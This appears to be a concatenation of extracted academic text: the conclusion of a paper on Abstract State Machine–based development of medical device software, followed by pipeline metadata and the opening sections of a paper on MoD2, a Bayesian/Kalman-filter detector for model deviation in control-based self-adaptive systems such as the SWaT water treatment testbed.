the complexity of the development process. The limitation of the approach is that no tool is currently available that is capable of automatically transforming an ASM model into a programming language code. However, a tool translating ASM models to C++ for the Arduino platform has been developed [19]. 7. Conclusions Different certification standards have been proposed for the development of medical device software. However, these standards provide general indications regarding the typical software engineering activities that must be performed, but do not prescribe the use of any particular method, technique, or life cycle model. In the paper, we have shown how a development process based on the Abstract State Machine formal method can be used for assuring safety and reliability in the development of medical device software. The process consists in an iterative and incremental life cycle model based on model refinement: through a sequence of refined models, all the requirements of the system are considered. Different validation and verification (visualization, simulation, model review, model checking) activities can be performed on each model, and each refinement step can be automatically proved correct. The implementation can be seen as the last refinement step, and its conformance with the formal specification can be checked by model-based testing and/or by runtime verification. We have described how the ASM-based process captures most of the activities required by the standards, and have shown the application of the ASM-based process to the hemodialysis machine case study. Acknowledgments The research reported in this paper has been partially supported by the Czech Science Foundation project number 17-12465S, and by the Austrian Ministry for Transport, Innovation and Technology, the Federal Ministry of Science, Research and Economy, and the Province of Upper Austria in the frame of the COMET center SCCH. References
{"Source-Url": "https://cs.unibg.it/gargantini/research/papers/abz2016_SI_SCP.pdf", "len_cl100k_base": 15701, "olmocr-version": "0.1.53", "pdf-total-pages": 42, "total-fallback-pages": 0, "total-input-tokens": 93054, "total-output-tokens": 21810, "length": "2e13", "weborganizer": {"__label__adult": 0.0005960464477539062, "__label__art_design": 0.0004668235778808594, "__label__crime_law": 0.0005249977111816406, "__label__education_jobs": 0.0015535354614257812, "__label__entertainment": 6.920099258422852e-05, "__label__fashion_beauty": 0.00030612945556640625, "__label__finance_business": 0.0004208087921142578, "__label__food_dining": 0.0006108283996582031, "__label__games": 0.0010766983032226562, "__label__hardware": 0.00244903564453125, "__label__health": 0.00482940673828125, "__label__history": 0.00036406517028808594, "__label__home_hobbies": 0.0001842975616455078, "__label__industrial": 0.0008492469787597656, "__label__literature": 0.0003254413604736328, "__label__politics": 0.00028824806213378906, "__label__religion": 0.0005831718444824219, "__label__science_tech": 0.07440185546875, "__label__social_life": 9.131431579589844e-05, "__label__software": 0.00848388671875, "__label__software_dev": 0.8994140625, "__label__sports_fitness": 0.0006728172302246094, "__label__transportation": 0.000995635986328125, "__label__travel": 0.0002999305725097656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 86172, 0.02781]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 86172, 0.55102]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 86172, 0.88403]], "google_gemma-3-12b-it_contains_pii": [[0, 2025, false], [2025, 4802, null], [4802, 7259, null], [7259, 9390, null], [9390, 11326, null], [11326, 12948, null], [12948, 15402, null], [15402, 18057, null], [18057, 20606, null], [20606, 22918, null], [22918, 25194, null], [25194, 28068, null], [28068, 30530, null], [30530, 31751, null], [31751, 34262, null], [34262, 35566, null], [35566, 37739, null], [37739, 39349, null], [39349, 40968, null], [40968, 43704, null], [43704, 44264, null], [44264, 46857, null], [46857, 49131, null], [49131, 51960, null], [51960, 52544, null], [52544, 54402, null], [54402, 56883, null], [56883, 58402, null], [58402, 61030, null], [61030, 61830, null], [61830, 63522, null], [63522, 66160, null], [66160, 68965, null], [68965, 71367, null], [71367, 73360, null], [73360, 75553, null], [75553, 77618, null], [77618, 79568, null], [79568, 81508, null], [81508, 83321, null], [83321, 85259, null], [85259, 86172, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2025, true], [2025, 4802, null], [4802, 7259, null], [7259, 9390, null], [9390, 11326, null], [11326, 12948, null], [12948, 15402, null], [15402, 18057, null], [18057, 20606, null], [20606, 22918, null], [22918, 25194, null], [25194, 28068, null], [28068, 30530, null], [30530, 31751, null], [31751, 34262, null], [34262, 35566, null], [35566, 37739, null], [37739, 39349, null], [39349, 40968, null], [40968, 43704, null], [43704, 44264, null], [44264, 46857, null], [46857, 49131, null], [49131, 51960, null], [51960, 52544, null], [52544, 54402, null], [54402, 56883, null], [56883, 58402, null], [58402, 61030, null], [61030, 61830, null], [61830, 63522, null], [63522, 66160, null], [66160, 68965, null], [68965, 71367, null], [71367, 73360, null], [73360, 75553, null], [75553, 77618, null], [77618, 79568, null], [79568, 81508, null], [81508, 83321, null], [83321, 85259, null], [85259, 86172, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 86172, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 86172, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 86172, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 86172, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 86172, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 86172, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 86172, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 86172, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 86172, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 86172, null]], "pdf_page_numbers": [[0, 2025, 1], [2025, 4802, 2], [4802, 7259, 3], [7259, 9390, 4], [9390, 11326, 5], [11326, 12948, 6], [12948, 15402, 7], [15402, 18057, 8], [18057, 20606, 9], [20606, 22918, 10], [22918, 25194, 11], [25194, 28068, 12], [28068, 30530, 13], [30530, 31751, 14], [31751, 34262, 15], [34262, 35566, 16], [35566, 37739, 17], [37739, 39349, 18], [39349, 40968, 19], [40968, 43704, 20], [43704, 44264, 21], [44264, 46857, 22], [46857, 49131, 23], [49131, 51960, 24], [51960, 52544, 25], [52544, 54402, 26], [54402, 56883, 27], [56883, 58402, 28], [58402, 61030, 29], [61030, 61830, 30], [61830, 63522, 31], [63522, 66160, 32], [66160, 68965, 33], [68965, 71367, 34], [71367, 73360, 35], [73360, 75553, 36], [75553, 77618, 37], [77618, 79568, 38], [79568, 81508, 39], [81508, 83321, 40], [83321, 85259, 41], [85259, 86172, 42]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 86172, 0.04722]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
e8701f9eb2a508cc7fbae762072194f0d4aadf8e
[REMOVED]
{"len_cl100k_base": 8992, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 37675, "total-output-tokens": 11031, "length": "2e13", "weborganizer": {"__label__adult": 0.0003848075866699219, "__label__art_design": 0.0006470680236816406, "__label__crime_law": 0.0005145072937011719, "__label__education_jobs": 0.004055023193359375, "__label__entertainment": 0.00013303756713867188, "__label__fashion_beauty": 0.00024819374084472656, "__label__finance_business": 0.0006303787231445312, "__label__food_dining": 0.0004591941833496094, "__label__games": 0.0007700920104980469, "__label__hardware": 0.0010080337524414062, "__label__health": 0.0010004043579101562, "__label__history": 0.0005011558532714844, "__label__home_hobbies": 0.0001984834671020508, "__label__industrial": 0.0006685256958007812, "__label__literature": 0.0008358955383300781, "__label__politics": 0.0003528594970703125, "__label__religion": 0.0005645751953125, "__label__science_tech": 0.291259765625, "__label__social_life": 0.00018489360809326172, "__label__software": 0.0226287841796875, "__label__software_dev": 0.671875, "__label__sports_fitness": 0.000278472900390625, "__label__transportation": 0.0006651878356933594, "__label__travel": 0.0002129077911376953}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 42792, 0.0225]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 42792, 0.56489]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 42792, 0.86826]], "google_gemma-3-12b-it_contains_pii": [[0, 3963, false], [3963, 9886, null], [9886, 12411, null], [12411, 15332, null], [15332, 18847, null], [18847, 23132, null], [23132, 26543, null], [26543, 31551, null], [31551, 33541, null], [33541, 38144, null], [38144, 42792, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3963, true], [3963, 9886, null], [9886, 12411, null], [12411, 15332, null], [15332, 18847, null], [18847, 23132, null], [23132, 26543, null], [26543, 31551, null], [31551, 33541, null], [33541, 38144, null], [38144, 42792, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 42792, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 42792, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 42792, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 42792, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 42792, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 42792, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 42792, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 42792, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 42792, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 42792, null]], "pdf_page_numbers": [[0, 3963, 1], [3963, 9886, 2], [9886, 12411, 3], [12411, 15332, 4], [15332, 18847, 5], [18847, 23132, 6], [23132, 26543, 7], [26543, 31551, 8], [31551, 33541, 9], [33541, 38144, 10], [38144, 42792, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 42792, 0.0]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
976f5cc2468be77dd6855324245a924f087337f0
Timely and Accurate Detection of Model Deviation in Self-Adaptive Software-Intensive Systems Yanxiang Tong State Key Lab for Novel Software Technology, Nanjing University Nanjing, China tongyanxiang@gmail.com Yi Qin∗ State Key Lab for Novel Software Technology, Nanjing University Nanjing, China yiqincs@nju.edu.cn Yanyan Jiang State Key Lab for Novel Software Technology, Nanjing University Nanjing, China jyy@nju.edu.cn Chang Xu State Key Lab for Novel Software Technology, Nanjing University Nanjing, China changxu@nju.edu.cn Chun Cao∗ State Key Lab for Novel Software Technology, Nanjing University Nanjing, China caochun@nju.edu.cn Xiaoxing Ma State Key Lab for Novel Software Technology, Nanjing University Nanjing, China xxm@nju.edu.cn ABSTRACT Control-based approaches to self-adaptive software-intensive systems (SASs) are hailed for their optimal performance and theoretical guarantees on the reliability of adaptation behavior. However, in practice the guarantees are often threatened by model deviations occurred at runtime. In this paper, we propose a Model-guided Deviation Detector (MoD2) for timely and accurate detection of model deviations. To ensure reliability, a SAS can switch a control-based optimal controller for a mandatory controller once an unsafe model deviation is detected. MoD2 achieves both high timeliness and high accuracy through a deliberate fusion of parameter deviation estimation, uncertainty compensation, and safe region quantification. Empirical evaluation with three exemplar systems validated the efficacy of MoD2 (93.3% shorter detection delay, 39.4% lower FN rate, and 25.2% lower FP rate), as well as the benefits of the adaptation-switching mechanism (abnormal rate dropped by 29.2%). CCS CONCEPTS • Software and its engineering → Software verification and validation; • Social and professional topics → Software selection and adaptation. KEYWORDS Self-Adaptive Software, Control Theory, Model Deviation Permission to make digital or hard copies of part or all of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for third-party components of this work must be honored. For all other uses, contact the owner/author(s). ESEC/FSE ’21, August 23–28, 2021, Athens, Greece © 2021 Copyright held by the owner/author(s). https://doi.org/10.1145/3468264.3468548 1 INTRODUCTION Control theory has been increasingly adopted in developing self-adaptive software-intensive systems [56, 59]. In designing a control-based self-adaptive system (control-SAS for short), developers first identify a nominal model (e.g., a linear time-invariant model) of the subject system (a.k.a. the managed system, or the plant in control jargon), and then design a managing system (a.k.a. the controller in control jargon) based on the identified model with some (feedback) control mechanisms such as Proportional-Integral-Derivative control or Model Predictive Control. The advantage of this approach is that the control mechanisms have well-established mathematical foundations that theoretically guarantee the optimality and reliability of the resulting SAS [25, 47, 65]. However, software-intensive systems behave differently from physical devices to which control theory is usually applied. The behavioral patterns of the former are more dynamic and uncertain than the latter. During its execution, a managed software-intensive system’s behavior often deviates from the identified nominal model [10, 25, 49]. This model deviation, if goes beyond a certain region, will invalidate the theoretical guarantees and threaten the safety of the whole system [9, 17, 46, 65]. Such problem of model deviation has been acknowledged in the literature, but to our knowledge no satisfactory solution was given [10, 11, 23, 44, 49, 60]. Using robust controllers [11, 44] can mitigate the problem by tolerating slight deviations at the cost of less optimality and more complexity in controller design, but the problem itself remains. Some authors proposed to monitor system outputs and rebuild the controller through system re-identification once the outputs violate some specified criteria [10, 23, 49]. However, this approach is less sensitive in that model deviations could have happened much earlier than their manifestation as abnormal outputs. It is crucial to report dangerous deviations as early as possible before they cause disastrous consequences. Sliding window-based model deviation detection approaches [12, 23, 35] require extensive domain knowledge and human efforts to tune their parameters. The emerging learning-based approaches [17, 57] reduce... the dependence on domain knowledge and human efforts, but are not speedy and accurate enough, as to be shown in Section 5. An alternative way is to monitor the managed system’s model parameter values directly, which could save the time that a model deviation propagates to the managed system’s abnormal output. Since the nominal model’s parameter values are unobservable, one have to calculate these values based on the observable inputs and outputs. However, both internal uncertainty (e.g., process noise) and external uncertainty (e.g., measurement error) would lead to an inaccurate calculation. Sliding window could alleviate the impact of measurement error to some extent, but it is less effective in handling slight model deviation, and still faces the problem of manually tuned parameters. In this paper, we propose the Model-guided Deviation Detector (MoD2) to support timely and accurate model deviation detection for control-SASs. The key intuition of MoD2 is to estimate the nominal model’s parameter values. Unlike most existing works that treat the nominal model’s parameter as a deterministic variable, MoD2 describes the parameter as a stochastic variable. The identified value is now considered as the parameter’s mean value, and we additionally identify the parameter’s variance. By leveraging the knowledge of the parameter’s distribution, MoD2 uses Bayesian estimation to achieve an effective estimation of its value. MoD2 also integrates two lightweight techniques, namely uncertainty compensation and safe region quantification, to further improve its accuracy without sacrificing too much timeliness. Based on MoD2, an adaptation-supervision mechanism is implemented to alleviate the impact of model deviation with a dual-track adaption strategy. The mechanism uses a supervision loop to guard the adaptation loop of a control-SAS. Once MoD2 detects model deviation, our mechanism will switch the control theory-based optimal controller for a mandatory controller that ensures the mandatory requirements but may scarify some system utilization. When model deviation disappears, the SAS can switch back to the optimal controller again. We evaluate our approach on three representative exemplar SAS systems, namely, SwaT [8], RUBiS [18], and video encoder [50]. We compare MoD2’s performance with two baseline approaches (i.e., a sliding window-based detector [23], and an SVM-based detector [17]). The results show the effectiveness of MoD2 which achieves 93.3% shorter detection delay, 39.4% lower FN rate, and 25.2% lower FP rate, as well as the usefulness of MoD2-based adaptation-supervision mechanism by reporting a 29.2% lower abnormal rate. In the remainder of this paper, section 2 gives the necessary background and discusses the motivation of our work. Then, section 3 introduces the adaptation-supervision mechanism, and section 4 details our MoD2 with three main techniques. Next, section 5 shows the experimental evaluation of our approach. Finally, section 6 discusses the related work, and section 7 concludes the paper. ## 2 BACKGROUND AND MOTIVATION In this section, we first introduce the background of control-SASs, with a motivating example of Secure Water Treatment testbed (SwaT for short) [8]. Then we discuss the impact of model deviation on self-adaptive systems as the limitation of existing approaches in handling model deviation. Next, we introduce Bayesian estimation and Kalman filter for estimating model parameter values. We then discuss our scope and assumptions in addressing the problem of model deviation. ### 2.1 Control-based self-adaptive systems In recent years, control-based self-adaptive systems [16, 23, 25, 26, 56, 59, 63] became a research hotspot for its less burden on the developers’ mathematical and software knowledge to design ad-hoc self-adaptation solutions. Filieri et al. first propose a methodology (i.e., the push-button method [23]) to implement control-SASs, which includes a systematic data collection and model fitting procedure (a.k.a., system identification [48]) and a control theory-guided controller designing procedure (a.k.a., controller synthesis). The identification procedure enables the automatic construction of an approximate model for the managed system, and the synthesized controller provides theoretical guarantees to the derived managing system’s behavior in controlling adaptation. Specifically, in system identification, control-SASs assume that the managed system’s behavior can be captured by a quantitative nominal model to improve productivity and cope with infinite kinds of environmental dynamics. A nominal model describes the relationship between the managed system’s output, the controller’s output, and the environmental input. Many types of nominal models have been proposed to support self-adaptation in various scenarios, including linear time-invariant system [4, 35, 61], linear time-varying system [37], and nonlinear time-invariant system [11]. In controller synthesis, control-SASs leverage various control-theoretical techniques to design the optimal controllers for various scenarios. Two of the most prevailing techniques are proportional-integral-derivative (PID) control [24, 44, 60], and model predictive control [4, 5, 49, 51]. A controller’s workflow resembles the conventional self-adaptation mechanism that consists of continuous adaptation loops of monitoring, analyzing, planning, and executing. A controller’s behavior should be subject to the control properties, for example, the SASO properties (i.e., stability, accuracy, settling time, and overshoot) [36]. Here, we use the SwaT system to explain the concepts of control-SASs. SwaT is a fully operational scaled-down water treatment plant that produces doubly-filtered drinking water. SwaT consists of five water-processing tanks, as well as the pipes connecting those tanks. The in-coming valve and out-going valve of each tank can be controlled remotely. The objective of a self-adaptive SwaT system is to enable safe (e.g., no overflow or underflow in any of the tanks) and efficient (e.g., maximum clean water production) water filtering under different environmental situations (e.g., the initial water level of the five tanks and the in-coming water flow of the first tank). To build such a self-adaptive SwaT system following the control-SASs methodology, we can use the following linear time-invariant system to describe the SwaT in system identification. \[ \begin{align*} \dot{x}(k) &= A \cdot x(k-1) + B \cdot u(k-1) \\ y(k) &= C \cdot x(k) \end{align*} \] (1) where \(k\) denotes a serial number of the adaption loop. For the variables, \(x(k)\) describes SwaT’s current running state (i.e., the in-coming and out-going water of the five tanks), \(x(k-1)\) describes the historical state, \( y(k) \) describes the system’s output value (i.e., the measured water levels of five tanks), and \( \bar{u}(k-1) \) describes its received control signal (i.e., the valves’ opening time in an adaptation loop). The parameters in Equation 1, including \( A \), \( B \), and \( C \), are identified for the system since their values cannot be measured directly. Each of these parameters represents a specific dynamical feature of SWaT. Specifically, \( A \) represents the system’s delay property, which describes the interval between the time when a controller requests to turn on/off a valve and the time when the valve is turned on/off. \( B \) represents the system’s controllability, which describes the influence of turning on/off a valve upon the system’s running state. \( C \) represents the system’s observability, which describes the mapping between each tank’s in-coming and out-going water flow and the measured water level. Based on the identified parameter values, SWaT’s developers provide a suite of well-designed controllers to enable the system’s adaptation to different environmental situations. These controllers leverage both control-theory and rule-based domain knowledge to guide the control strategies of various valves. Concretely, there are a total of six controllers. Four control the in-coming and out-going valves of one or two tanks, respectively. Two controllers control the general water treatment procedure and coordinate with the other four. Control theory guarantees the self-adaptive SWaT system subjecting to the control properties. For example, the water in all tanks should neither overflow nor underflow (i.e., subject to no overshoot property). Meanwhile, the water level in all tanks should reach the desired level quickly (i.e., subjecting to low settling time property), in order to maximize SWaT’s clean water production. Lots of self-adaptive system researchers acknowledge the existence of model deviation, and propose different solutions. In push-button-method [23], Filieri et.al first identify model deviation, address it by monitoring system outputs, and rebuild the controller through system re-identification. Some other works [10, 24, 49] also rely on re-identification to handle model deviation. Some researchers focus on improving the controller’s robustness to tolerate slight deviations [11, 44]. These solutions have their own limitations. For the robust strengthening approaches, model deviation does cause the controller designed by field experts to behave abnormally, in our previous motivating example of SWaT. We cannot simply assume that developer-designed controllers could overcome model deviation as in [11, 44]. For the re-identification approaches, it is too slow to be effective since model deviations could have happened much earlier than their manifestation as abnormal outputs (Kang et.al report that it takes around 5 minutes for a detected attack to fail SWaT’s execution [42]). The latency between model deviation’s occurrence and its observable consequences make it crucial to report dangerous deviations as early as possible. As we discussed in Section 1, the challenge is to balance the detection’s timeliness and accuracy. Existing works fail to balance this in detecting model deviation. For the sliding window-based approaches that have been exploited long by self-adaptive researchers [12, 23, 35], their performance largely depends on manual or empirical settings (e.g., size of the sliding window-based and the threshold for monitored system’s output values). It often requires extensive domain and mathematical knowledge for an appropriate setting, which is impossible for non-experts. For those newly-proposed learning-based approaches [17, 57], they usually combine multiple test results for improving their detection accuracy, which prolongs their detection delay. What’s more, these approaches often require binary training sets, the positive instances of which can hardly be prepared since the managed system’s behavior under model deviation is unpredictable. Our MoD2 addresses the challenge above following the guidance of the nominal model. First, MoD2 fundamentally decreases its detection delay by deriving the nominal model’s parameter values with Bayesian estimation. Second, MoD2 improves its estimation accuracy and detection accuracy with two supporting techniques, namely, uncertainty compensation and safe region quantification. Third, MoD2 further reduces the time overhead of its estimation and detection by Kalman filter and probability-based quantification, respectively. ### 2.2 Model deviation in control-based self-adaptive systems Model deviation undermines control-SASs. Model deviation is the mismatch between the nominal model’s identified parameter values and its actual values at runtime. The occurrence of model deviation may invalidate the theoretical guarantees provided by control theory and could potentially cause the abnormal behavior of a control-SAS. Let us consider two real-world cases of model deviation in SWaT. The first one is reported by Adepu et al. that network attacks could cause SWaT’s abnormal behavior [1]. For instance, if the controller’s signal of turning on a valve is blocked or tampered with, the valves’ opening time will be changed accordingly. Then, when the controlled tank’s water level exceeds an alarming level, the corresponding controller will still control the valves according to the unchanged \( B \) value and cause tank overflow. In the second case, the physical condition of SWaT’s pipes and valves will also lead to model deviation. For example, physical abrasion [21] may wear the valves and result in the change of water flow rate (i.e., system’s controllability feature \( B \)). When a controller still controls the valves based on the unchanged \( B \) value, the water flow into the tank will be smaller than what the controller expected and may cause the tank to underflow. Bayesian estimation [29] enables one to estimate an unobservable parameter value (the value of \( B(k) \) in our case). To improve its accuracy, the approach requires a priori information about the parameter’s distribution (i.e., mean value and variance of all collected \( B \) values in system identification). Bayesian estimation works in an iterative manner. In each iteration, we first compute a prior distribution of the concerned parameter that matches the past observations and the identified distribution. Then, the prior is combined with the current observations to obtain a posterior distribution which is reported as the current estimation value. In Bayesian estimation, one has to calculate the prior and posterior distributions in every iteration, which brings a considerable overhead. Kalman filter reduces this overhead by deriving the current prior and posterior distributions through updating the previous distributions. Specifically, Kalman filter uses a recursive factor $K$ (also called Kalman gain) to approximate the relationship of the prior/posterior distributions from two or multiple consecutive iterations. When such relationship is linear or can be approximate linearly, Kalman filter could produce an accurate and fast estimation of the concerned parameter. ### 2.4 Our scope and assumptions Due to the various application scenarios of self-adaptive systems, the proposed MoD2 has its scope and assumptions for ease of discussion and presentation. We delineate our scope based on existing work and inherit pre-existing assumptions from other self-adaptation or control theory research. Notice we only give our assumptions and clarify their realistic here. We will discuss MoD2’s limitations brought by these assumptions in Section 4.4. **Nominal model.** In this work, we focus on linear time-invariant system (LTI system for short). LTI system is one of the most widely-used models among self-adaptation researchers [35, 49, 60], and has been successfully applied in different subjects [4, 61]. **Model deviation.** We focus on two types of model deviation, discrete behavior and inaccurate environmental interaction, following the two reported cases in our motivating example of SWaT. One occurs when a controller produces its control signals (e.g., block or tamper with the instruction to open the valves) and the other occurs when the managed system receives the control signals (e.g., water flow changing due to physical abrasion). Based on the two types of model deviation, in this work, we focus on the deviation of the managed system’s controllability features (i.e., the parameter $B$) and assume that the managed system’s delay and observability features (i.e., parameter $A$ and $C$) are comparatively stable. Recent literatures [1, 2, 41] report and validate the deviation of the controllability features. We also assume that $B(i)$ is a unary parameter for ease of presentation. Nevertheless, our approach can be applied to a multinary parameter. **Environmental uncertainty.** Environmental uncertainty is the known unknown information at runtime [4, 20]. As a result, one has to model the target uncertainty first before addressing it. In this paper, we assume that the environmental uncertainty can be described by a linear time-invariant model or a normal distribution. The former is a widely used approach in describing uncertain environmental input by the control theory [13, 62], and the latter is a typical setting for describing uncertainty’s influence among self-adaptive systems [19, 64]. ### 3 AN ADAPTATION-SUPERVISION MECHANISM To address the problem of model deviation, this paper proposes an adaptation-supervision mechanism to supervise the execution of control-SASs as shown in Figure 1. Intuitively, we added a new parallel supervision loop to a control-SAS. The supervisor continuously monitors the adaptation loop. When model deviation is detected, the supervisor immediately “falls back” to a safer (but less efficient) mandatory controller and recovers to the main control loop after successful model re-identification. The supervisor consists of three major components: a model-guided deviation detector (MoD2, which is this paper’s primary focus), a mandatory controller, and a switcher. Underlined blocks in Figure 1 denote these newly added components. In the adaptation-supervision mechanism, we first require the system designer to provide a mandatory controller that guarantees minimal system functionality (i.e., mandatory requirements) even on nominal-model deviation. Mandatory controllers have been extensively studied by the community of control-SASs, e.g., by adopting architectural-guided [27] or goal-driven rules [58]. With both control theory-based optimal controller and mandatory controller, the switcher coordinates them on the MoD2. The switcher immediately changes the adaptation loop from using the optimal controller to using the mandatory controller on model deviation to reduce the unpredictable influences to a minimum. The switcher is also responsible for consistently conducting model re-identification and turning back to the optimal controller when the abnormal situation has disappeared (e.g., the network attack of... SWaT was blocked by a firewall. The switcher can be implemented following the push button method [23]. Therefore, the design of an efficient and effective model-deviation detector (our MoD2) should be the key point. 4 MOD2: MODEL-GUIDED DEVIATION DETECTOR The three major technical designs (and contributions) of the proposed MoD2 are: 1. MoD2 directly estimates the nominal model’s parameter values by modeling the nominal model’s parameter $B$ as a time-variant stochastic variable $\hat{B}(k)$. In contrast with existing work, which is mostly based on the observable outputs $y(k)$, this white-box approach accelerates the model-deviation detection and improves the accuracy. 2. MoD2 compensates environmental uncertainty in the nominal model by introducing compensation terms to reduce the consequences of measurement errors, yielding improved model-deviation estimation accuracy. MoD2 adopts the Kalman filter, a fast Bayesian estimator, to accelerate its estimation on the parameter values. 3. MoD2 directly quantifies the nominal model’s theoretical safe region without the need for calibrating an empirical threshold based on execution traces of the managed system. By using the necessary conditions under which model deviation can make the controller behave abnormally, MoD2 directly (and thus timely) reports model deviation with sufficient probabilistic confidence. These technical details are elaborated as follows. 4.1 Parameter deviation estimation We first describe the concerned model parameter $B$ as a time-variant stochastic variable $\hat{B}(k)$: $$B(k) = B(k-1) + \omega \cdot (\hat{B} - B(k-1)) + q(k)$$ (2) where: (1) The parameter’s deviation is described as the sudden changes of centripetal force $\omega$ that drive $B(k)$ away from identified $\hat{B}$. (2) The parameter’s inherent fluctuation is described as a random walk procedure, the step of which subjects to a normal distribution $q(k)$. If the system is free from model deviation (i.e., $\omega = 0$), the variance of $q(k)$ equals to the variance of $B(k)$, which can be acquired along with the identification of $\hat{B}$. Combining Equation 1 and Equation 2 enables MoD2 to estimate the value of $B(k)$ in a Bayesian approach. Specifically, in the $i$-th adaptation loop, a prior distribution of $B(i)$ is computed that fits the previous posterior distribution $\hat{B}(i-1)$ and identified variance of $q(k)$, according to Equation 2. Then, MoD2 calibrates the posterior distribution of $B(i)$ by updating the prior distribution of $B(i)$ with the current observation (i.e., $\hat{x}(i-1)$, $\hat{u}(i-1)$, and $y(i)$), according to Equation 1. Note that we might not be able to observe the value of system state $\hat{x}(i)$ directly in some cases. We also use Bayesian estimation to estimate $\hat{x}(i)$’s value. In this situation, each iteration of Bayesian estimation has two steps. MoD2 first estimates $\hat{x}(i-1)$’s value by treating the previous estimated $B(i-1)$ as an observation. Then, the obtained $\hat{x}(i-1)$ is used to estimate the current parameter value $B(i)$. 4.2 Uncertainty compensation Due to various environmental uncertainties, a direct estimation of $B(i)$’s value is usually inaccurate. To reduce uncertainty-based errors in the estimations of $B(i)$, we refine the nominal model by compensating for environmental uncertainty and accelerate our estimation with the Kalman filter. Using compensation terms to refine a nominal model is a widely-used technique in the control theory community [30]. However, one has to carefully design the effective compensation terms. Here, we introduce three different compensation terms. One is the measured environmental input $a(k)$, which can be used to posterior calibrate our estimated $B(i)$’s value. We use a linear time-invariant model to describe the influence brought by environmental input. The other two compensation terms, $w(k)$ and $v(k)$, capture the influences of measurement errors on the managed system’s internal state and external behavior, respectively. According to our assumptions, we depict $w(k)$ and $v(k)$ as normal distribution of variance $W$ and $V$. Then, the nominal model (Equation 1) is refined with three compensation terms, as follows: $$\hat{x}(k) = A \cdot \hat{x}(k-1) + B(k) \cdot \hat{u}(k-1) + \gamma \cdot a(k) + w(k)$$ (3) $$y(k) = C \cdot \hat{x}(k) + v(k)$$ where $\gamma$ is the coefficient of the linear model that describes $a(k)$. The value of $\gamma$ which is acquired during system identification along with other model parameters. Based on Equation 3, MoD2 further alleviates the impact of measurement error by transforming the nominal model to difference equations. In the original nominal model, the measurement error on parameter values (e.g., $A$) is multiplied by other variables (e.g., $\hat{x}(k-1)$). As a result, a large variable value would amplify the measurement error and make the following estimation less accurate. MoD2 uses the difference equation to address the impact of this multiplier effect. If the managed system’s behavior is free from severe changes, a variable’s values in two consecutive adaptation loops should not differ a lot [14, 55], and the difference equation can thus alleviate the multiplier effect. Otherwise, it could be easier for us to detect. In this paper, we use $\Delta \alpha \cdot A(k)$ to denote the difference between variable $\alpha$’s values in the $k$-th and $(k-1)$-th adaptation loop (i.e., $\Delta \alpha \cdot A(k) = \alpha(k) - \alpha(k-1)$). Thus the difference equations of the nominal model are listed as follows: $$\Delta \hat{x}(k) = A \cdot \Delta \hat{x}(k-1) + B(k) \cdot \Delta \hat{u}(k-1) + \gamma \cdot \Delta a(k) + \Delta w(k)$$ $$\Delta y(k) = C \cdot \Delta \hat{x}(k) + \Delta v(k)$$ (4) Notice that if the controller’s control signal keeps unchanged, the difference equations are ineffective since the estimated $B$ will be eliminated by multiplying zero ($\Delta \hat{u}(k-1) = \hat{u}(k) - \hat{u}(k-1) = 0$). In this situation, we use the original nominal model to estimate $B(k)$’s value instead of the difference equations. With those compensation terms introduced, it would be extremely time-consuming to perform the original Bayesian estimation. MoD2 accelerates its estimation by using Kalman filter [43, 45], a more efficient linear quadratic estimation approach. Conceptually, Kalman filter works by updating the prior distribution of $B(i)$ with the latest observation only (i.e., $\tilde{x}(i-1)$, $\tilde{u}(i-1)$, and $y(i)$), instead of re-calculating the prior with all historical observations (i.e., $\tilde{x}(0)$–$\tilde{x}(i-1)$, $\tilde{u}(0)$–$\tilde{u}(i-1)$, and $y(0)$–$y(i)$). MoD2’s Kalman filter parameter estimation also follows an iterative manner as the original Bayesian estimation. However, it can give a more accurate normal distribution of the estimated parameters by filtering the effects of compensation terms (i.e., $a(i)$, 